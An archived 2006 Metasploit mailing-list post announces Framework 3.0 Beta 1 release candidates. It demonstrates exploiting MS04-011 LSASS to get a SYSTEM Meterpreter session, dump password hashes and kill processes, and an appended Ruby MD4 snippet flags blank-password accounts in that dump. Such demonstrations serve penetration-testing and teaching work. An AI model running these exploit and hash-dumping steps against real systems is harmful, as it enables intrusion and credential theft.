Metasploit mailing list archives

Metasploit Framework 3.0 Beta 1 (Almost!)


From: hdm at metasploit.com (H D Moore)
Date: Mon, 31 Jul 2006 03:20:31 -0500

Hi everyone,

We could use some help testing out the next version of the Metasploit 
Framework. If you could take a few minutes to download the release 
candidates below and send us your feedback, we would appreciate it. If 
everything goes well, the actual Beta-1 release of 3.0 will happen on the 
morning of August 2nd (Wednesday) at the Black Hat conference in Las 
Vegas. If you would like to discuss the beta release with other users, 
please subscribe to the framework-beta mailing list by sending a blank 
email to framework-beta-subscribe[at]metasploit.com. Please keep all 
replies related to the beta release candidate off of the main framework 
mailing list in order to spare the bandwidth of those not interested.

Some quick highlights compared to version 2.6:
- Smaller exploit set, since not everything has been ported
- All modules are organized in a tree, versus flat lists
- The Meterpreter payload is much smoother all around
- New type of "passive" exploits (browser, sniffer, ids attacks)
- Denial of service modules (ms05-035 and unpatched RRAS)
- Support for multiple shells per exploit with passive modules

Unix users should use the following tarball:
- http://metasploit.com/tools/framework-3.0-beta-1-rc1.tar.gz

Windows users should use the following installer:
- http://metasploit.com/tools/framework-3.0-beta-1-rc1.exe

Unix users may need to install the openssl and zlib ruby modules for the 
Framework to load. If you are using Ubuntu, run the following commands:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby

Users of other distributions or Unix flavors may want to grab the latest 
version of ruby from www.ruby-lang.org and build it from source.

Windows users will need to exit out of any running Cygwin-based 
applications before running the installer or using the Framework. We 
really tried to work with the native ruby interpreter for Windows, but 
numerous io/readline/stdin issues came up and we will try again once the 
code base gets a little more stable.

These RC1 installers will be removed as soon as the final version of 
Beta-1 becomes stable. Please read documentation/LICENSE for the new 
licensing terms of the Metasploit Framework (3.x only).

Thanks!

-HD

A quick demonstration of using msfconsole with meterpreter:


 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads
+ -- --=[ 16 encoders - 4 nops
       =[ 4 aux

msf > use exploit/windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler..
[*] Getting OS information...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.145:41829 -> 192.168.0.106:4444)
[*] The DCERPC service did not reply to our request

Loading extension stdapi...success.
meterpreter > getuid
Server username: SYSTEM

meterpreter > use priv
Loading extension priv...success.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WIN2000DC:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IWAM_WIN2000DC:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NetShowServices:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
TsInternetUser:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > cd c:\
meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified                 Name
----              ----       ----  -------------                 ----
100444/r--r--r--  0          fil   Sat Oct 09 11:03:03 CDT 2004  IO.SYS
100444/r--r--r--  0          fil   Sat Oct 09 11:03:03 CDT 2004  MSDOS.SYS
40777/rwxrwxrwx   0          dir   Sat Oct 09 11:21:49 CDT 2004  RECYCLER
40777/rwxrwxrwx   0          dir   Sat May 21 18:12:30 CDT 2005  WINNT
100666/rw-rw-rw-  195        fil   Sat Oct 09 05:38:57 CDT 2004  boot.ini
100444/r--r--r--  214416     fil   Mon Dec 06 14:00:00 CST 1999  ntldr
[ snip ]

meterpreter > ps

Process list
============

    PID   Name               Path
    ---   ----               ----
    176   smss.exe           \SystemRoot\System32\smss.exe
    200   csrss.exe          \??\C:\WINNT\system32\csrss.exe
    224   winlogon.exe       \??\C:\WINNT\system32\winlogon.exe
    252   services.exe       C:\WINNT\system32\services.exe
    264   lsass.exe          C:\WINNT\system32\lsass.exe
    440   svchost.exe        C:\WINNT\system32\svchost.exe
[ snip ]
    1804  wins.exe           C:\WINNT\System32\wins.exe
    2676  logon.scr          C:\WINNT\system32\logon.scr

meterpreter > kill 2676
Killing: 2676
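
A way to read the hashdump output in the demonstration above, added here as an example and not code from the post or from the Metasploit Framework: every account in that listing carries the LM hash aad3b435b51404eeaad3b435b51404ee and the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0, which are the hashes of an empty password, so that target's accounts have blank passwords. The snippet computes the NT hash (MD4 over the UTF-16LE password) with a pure-Ruby MD4, so it does not depend on OpenSSL still shipping MD4, and flags the accounts whose NT hash equals the empty-password hash. The six hashdump lines are the ones from the post; the svc_backup line and its password are constructed for contrast.

```ruby
# Recognize blank-password accounts in pwdump-format lines such as
# meterpreter's "hashdump" prints:   user:rid:LMhash:NThash:::
# Added example, not Metasploit code. Pure-Ruby MD4 (RFC 1320) so the
# NT hash can be computed even where OpenSSL's MD4 is disabled.

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee" # LM hash of "" (also used when LM storage is off)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0" # MD4 of the empty UTF-16LE string

def rotl32(x, n)
  ((x << n) | (x >> (32 - n))) & 0xffffffff
end

# MD4 digest of a binary string, returned as lowercase hex.
def md4(data)
  a, b, c, d = 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476
  msg = data.b + "\x80".b                       # append the 0x80 pad byte
  msg << "\x00".b while msg.bytesize % 64 != 56 # zero-pad to 56 mod 64
  msg << [data.bytesize * 8].pack("Q<")         # 64-bit little-endian bit length

  msg.unpack("V*").each_slice(16) do |x|        # 16 little-endian words per block
    aa, bb, cc, dd = a, b, c, d

    # Round 1: F(x,y,z) = (x & y) | (~x & z), message words in order 0..15
    s1 = [3, 7, 11, 19]
    16.times do |i|
      f = (b & c) | ((b ^ 0xffffffff) & d)
      a = rotl32((a + f + x[i]) & 0xffffffff, s1[i % 4])
      a, b, c, d = d, a, b, c
    end

    # Round 2: G(x,y,z) = majority, words 0,4,8,12,1,5,9,13,...
    s2 = [3, 5, 9, 13]
    16.times do |i|
      k = (i % 4) * 4 + i / 4
      g = (b & c) | (b & d) | (c & d)
      a = rotl32((a + g + x[k] + 0x5a827999) & 0xffffffff, s2[i % 4])
      a, b, c, d = d, a, b, c
    end

    # Round 3: H(x,y,z) = x ^ y ^ z, words 0,8,4,12,2,10,6,14,1,9,5,13,3,11,7,15
    s3 = [3, 9, 11, 15]
    order3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    16.times do |i|
      h = b ^ c ^ d
      a = rotl32((a + h + x[order3[i]] + 0x6ed9eba1) & 0xffffffff, s3[i % 4])
      a, b, c, d = d, a, b, c
    end

    a = (a + aa) & 0xffffffff
    b = (b + bb) & 0xffffffff
    c = (c + cc) & 0xffffffff
    d = (d + dd) & 0xffffffff
  end

  [a, b, c, d].pack("V4").unpack1("H*")
end

# NT hash: MD4 over the password encoded as UTF-16LE, no salt.
def nt_hash(password)
  md4(password.encode("UTF-16LE"))
end

# Parse pwdump lines into hashes; lines that do not have four fields are skipped.
def parse_hashdump(text)
  text.each_line.map do |line|
    user, rid, lm, nt = line.strip.split(":")
    next nil unless user && rid && lm && nt
    { user: user, rid: rid.to_i, lm: lm.downcase, nt: nt.downcase }
  end.compact
end

# Accounts whose password is empty. The NT hash is the reliable signal: an
# empty LM field only means LM hashes are not stored, not that the password is blank.
def blank_password_accounts(text)
  parse_hashdump(text).select { |h| h[:nt] == nt_hash("") }.map { |h| h[:user] }
end

# First six lines are from the post's hashdump output; svc_backup is constructed
# (NT hash of the string "password") so the filter has something to reject.
SAMPLE_HASHDUMP = <<~DUMP
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  IUSR_WIN2000DC:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  IWAM_WIN2000DC:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  NetShowServices:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  TsInternetUser:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc_backup:1005:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
DUMP

if __FILE__ == $0
  puts "empty NT hash: #{nt_hash('')}"
  puts "blank-password accounts: #{blank_password_accounts(SAMPLE_HASHDUMP).join(', ')}"
end
```

Run it with `ruby hashdump_check.rb`; it prints the six accounts from the post and not svc_backup. The same check applies to any pwdump-style output, and comparing against `nt_hash("")` rather than the literal constant keeps the MD4 implementation honest.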
